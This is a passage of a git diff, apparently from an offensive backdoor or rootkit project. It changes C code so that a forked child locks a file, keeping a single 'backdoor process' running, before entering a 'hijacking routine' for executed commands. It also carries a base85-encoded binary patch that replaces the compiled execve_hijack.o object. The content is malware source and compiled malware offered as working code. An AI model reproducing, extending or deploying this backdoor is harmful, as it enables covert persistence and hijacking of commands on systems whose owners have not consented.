+        //First of all check if the locking log file is locked, which indicates that the backdoor process is already running
+        int fd = open(LOCK_FILE, O_RDWR | O_CREAT | O_TRUNC, 0666);
+        if(fd<0){
+            perror("Failed to open lock file before entering hijacking routine");
+            exit(-1);
+        }
+        if (flock(fd, LOCK_EX|LOCK_NB) == -1) {
+            if (errno == EWOULDBLOCK) {
+                perror("lock file was locked");
+            } else {
+                perror("Error with the lockfile");
+            }
+            exit(-1);
+        }
+        hijacker_process_routine(argc, argv, fd);
         printf("Child process is exiting\n");
-        hijacker_process_routine(argc, argv);
         exit(0);
     }
     //Parent process. Call original hijacked command
diff --git a/src/helpers/execve_hijack.o b/src/helpers/execve_hijack.o
index 68eafa48d877a9b4edb9c83e03518a6492bffe88..6dd4147396c4433ee58d0a4d631401d690fabfe9 100644
GIT binary patch
literal 9792
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
JTmJ3V|2Hx$_J;rf

literal 9224
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
PwHj(OhTqs!RQ-Pg44h<l